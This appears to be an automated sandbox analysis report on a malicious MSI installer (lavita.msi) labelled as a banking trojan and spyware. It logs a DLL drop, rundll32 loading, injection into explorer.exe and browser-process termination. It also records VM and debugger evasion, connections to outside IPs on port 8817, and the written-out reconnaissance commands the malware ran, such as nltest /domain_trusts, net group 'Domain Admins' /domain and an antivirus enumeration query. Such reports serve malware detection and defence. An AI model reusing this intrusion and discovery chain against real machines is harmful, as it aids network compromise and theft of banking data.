            Source: explorer.exe, 00000007.00000002.4614759735.000000000C354000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
            Source: explorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cabgMW
            Source: explorer.exe, 00000007.00000000.2402983007.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4606667288.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknown HTTPS traffic detected: 172.67.161.60:443 -> 192.168.2.6:49935 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49959 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49978 version: TLS 1.2

            E-Banking Fraud

            Source: C:\Windows\explorer.exe Code function: CreateToolhelp32Snapshot, Process32First, GetCurrentProcessId, OpenProcess, StrStrIA, StrStrIA, StrStrIA, TerminateProcess, CloseHandle, Process32Next, CloseHandle, chrome.exe 7_2_0B844948
            Source: C:\Windows\explorer.exe Code function: CreateToolhelp32Snapshot, Process32First, GetCurrentProcessId, OpenProcess, StrStrIA, StrStrIA, StrStrIA, TerminateProcess, CloseHandle, Process32Next, CloseHandle, iexplore.exe 7_2_0B844948

            System Summary

            Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
            Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
            Source: C:\Windows\System32\rundll32.exe Code function: 4_3_000001DA0319D270 NtAllocateVirtualMemory
            Source: C:\Windows\System32\rundll32.exe Code function: 4_3_000001DA0319D2E0 NtProtectVirtualMemory
            Source: C:\Windows\explorer.exe Code function: 7_2_02F282B4 NtFreeVirtualMemory
            Source: C:\Windows\explorer.exe Code function: 7_2_02F2B388 NtAllocateVirtualMemory
            Source: C:\Windows\explorer.exe Code function: 7_2_02F2C704 NtDelayExecution
            Source: C:\Windows\explorer.exe Code function: 7_2_02F280B8 RtlInitUnicodeString, NtCreateFile
            Source: C:\Windows\explorer.exe Code function: 7_2_02F28240 NtClose
            Source: C:\Windows\explorer.exe Code function: 7_2_02F281C8 NtWriteFile
            Source: C:\Windows\explorer.exe Code function: 7_2_02F301A0 NtFreeVirtualMemory, CreateMutexExW
            Source: C:\Windows\explorer.exe Code function: 7_2_02F30130 NtAllocateVirtualMemory
            Source: C:\Windows\explorer.exe Code function: 7_2_0B84248C NtFreeVirtualMemory
            Source: C:\Windows\explorer.exe Code function: 7_2_0B84241C NtAllocateVirtualMemory
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\42c1d8.msi
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC2F1.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC35F.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC39F.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC3DE.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{6526CBB4-D28A-4CBC-AF93-907FED1F0EB9}
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC4AA.tmp
            Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIC2F1.tmp
            Source: appgpuset.dll.2.dr, Static PE information: Number of sections : 12 > 10
            Source: lavita.msi, Binary or memory string: OriginalFilenameAICustAct.dllF vs lavita.msi
            Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR, Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
            Source: classification engine, Classification label: mal100.spre.bank.troj.spyw.evad.winMSI@62/24@5/4
            Source: C:\Windows\System32\rundll32.exe, Code function: 4_2_00007FFD92DC1180 FreeLibrary,FreeLibrary,GetModuleFileNameW,GetLastError,FormatMessageW
            Source: C:\Windows\System32\rundll32.exe, Code function: 4_3_00007DF496590000 CreateToolhelp32Snapshot,Process32First,Process32Next
            Source: C:\Windows\System32\rundll32.exe, Code function: 4_2_00007FFD92DC1460 CoCreateInstance
            Source: C:\Windows\System32\msiexec.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\CMLC533.tmp
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
            Source: C:\Windows\System32\rundll32.exe, Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_03
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:992:120:WilError_03
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2540:120:WilError_03
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_03
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2036:120:WilError_03
            Source: C:\Windows\System32\conhost.exe, Mutant created: Local\SM0:2736:120:WilError_03
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
            Source: C:\Windows\System32\conhost.exe, Mutant created: Local\SM0:5424:120:WilError_03
            Source: C:\Windows\System32\msiexec.exe, File created: C:\Windows\TEMP\~DF5F817CD448FE08F8.TMP
            Source: C:\Windows\System32\systeminfo.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\explorer.exe, File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\rundll32.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\msiexec.exe, Process created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe appgpuset.dll, GfeXcodeFunc
            Source: unknown, Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\lavita.msi"
            Source: unknown, Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exe, Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 50018695A6192D85B7480687F9E151A9
            Source: C:\Windows\explorer.exe, Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\explorer.exe, Process created: C:\Windows\System32\cmd.exe /c systeminfo
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\systeminfo.exe, Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\explorer.exe, Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
            Source: C:\Windows\explorer.exe, Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
            Source: C:\Windows\explorer.exe, Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\explorer.exe, Process created: C:\Windows\System32\cmd.exe /c net view /all
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\explorer.exe, Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\net.exe, Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
            Source: C:\Windows\explorer.exe, Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
            Source: C:\Windows\System32\wbem\WMIC.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exe, Process created: C:\Windows\System32\cmd.exe /c net config workstation
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\net.exe, Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
            Source: C:\Windows\explorer.exe, Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
            Source: C:\Windows\System32\rundll32.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
            Source: Window Recorder, Window detected: More than 3 window changes detected
            Source: lavita.msi, Static file information: File size 2416640 > 1048576
            Source: Binary string: C:\dvs\p4\build\sw\rel\gfclient\rel_03&3!ZxZQ9rbTQA!n8N>7T3de\GfeXCode\win7_amd64_release\GfeXCode64.pdb source: rundll32.exe, 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmp, appgpuset.dll.2.dr
            Source: Binary string: de\GfeXCode\win7_amd64_release\GfeXCode64.pdb source: rundll32.exe, 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmp, appgpuset.dll.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.dr
            Source: C:\Windows\explorer.exe, Code function: 7_2_0B8489E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary
            Source: appgpuset.dll.2.dr, Static PE information: real checksum: 0x32b556 should be: 0x3d53c2
            Source: appgpuset.dll.2.dr, Static PE information: section name: .giats
            Source: appgpuset.dll.2.dr, Static PE information: section name: minATL
            Source: appgpuset.dll.2.dr, Static PE information: section name: .00cfg
            Source: C:\Windows\System32\rundll32.exe, Code function: 4_2_000000018002CF10 push rsp; iretd 4_2_000000018002CF11
            Source: C:\Windows\explorer.exe, Code function: 7_2_02F2E690 push rbx; retf 7_2_02F2E697
            Source: C:\Windows\explorer.exe, Code function: 7_2_02F2E3E7 push 62DF9C6Fh; iretd 7_2_02F2E3EC
            Source: C:\Windows\explorer.exe, Code function: 7_2_02F2F551 push rsi; retf 7_2_02F2F552

            Persistence and Installation Behavior

            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\gpuset\appgpuset.dllJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC2F1.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC39F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC35F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC3DE.tmpJump to dropped file

            Boot Survival

            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBB800 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00007FFD92DBB800
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8476DC rdtsc 7_2_0B8476DC
            Source: C:\Windows\explorer.exeCode function: 7_2_0B844948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,7_2_0B844948
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,7_2_02F27274
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,7_2_02F28424
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,7_2_02F30610
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 511Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8851Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 896Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 859Jump to behavior
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC2F1.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC39F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC35F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC3DE.tmpJump to dropped file
            Source: C:\Windows\System32\rundll32.exeAPI coverage: 1.3 %
            Source: C:\Windows\explorer.exe TID: 5140Thread sleep time: -221000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 764Thread sleep time: -51100s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 5140Thread sleep time: -8851000s >= -30000sJump to behavior
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domainJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB56A0 FindFirstFileExW,4_2_00007FFD92DB56A0
            Source: C:\Windows\explorer.exeCode function: 7_2_02F2A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,7_2_02F2A8E0
            Source: C:\Windows\explorer.exeCode function: 7_2_02F22B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,7_2_02F22B28
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8416F4 FindFirstFileW,FindNextFileW,LoadLibraryW,7_2_0B8416F4
            Source: C:\Windows\explorer.exeCode function: 7_2_0B846604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,7_2_0B846604
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8E50D8 FindFirstFileA,7_2_0B8E50D8
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBD230 GetSystemInfo,4_2_00007FFD92DBD230
            Source: explorer.exe, 00000007.00000002.4606667288.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
            Source: explorer.exe, 00000007.00000002.4606667288.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000007.00000002.4606667288.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
            Source: explorer.exe, 00000007.00000002.4610617935.00000000098E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
            Source: explorer.exe, 00000007.00000002.4606667288.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
            Source: explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F3D9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4606667288.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
            Source: explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 00000007.00000002.4610617935.00000000098E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
            Source: explorer.exe, 00000007.00000003.3296435494.0000000002E20000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
            Source: explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000007.00000002.4610617935.00000000098E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-83090
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            Source: C:\Windows\System32\wbem\WMIC.exeSystem information queried: CodeIntegrityInformation
            Source: C:\Windows\System32\findstr.exeSystem information queried: CodeIntegrityInformation
            Source: C:\Windows\System32\wbem\WMIC.exeSystem information queried: KernelDebuggerInformation
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8476DC rdtsc 7_2_0B8476DC
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBB110 IsDebuggerPresent,4_2_00007FFD92DBB110
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018003EEEC EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_000000018003EEEC
            Source: C:\Windows\explorer.exeCode function: 7_2_0B844948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,7_2_0B844948
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8489E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,7_2_0B8489E4
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB5730 GetProcessHeap,4_2_00007FFD92DB5730
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe appgpuset.dll, GfeXcodeFuncJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBF120 __scrt_fastfail,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFD92DBF120
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180032DD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0000000180032DD8
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8D1DA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0B8D1DA0
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8E53A8 SetUnhandledExceptionFilter,7_2_0B8E53A8

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\explorer.exeNetwork Connect: 104.21.16.1 443Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 94.232.46.11 8817Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 94.232.40.41 8817Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.161.60 443Jump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 2F20000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\System32\net.exeMemory allocated: C:\Windows\System32\net1.exe base: 241E5A50000 protect: page read and write
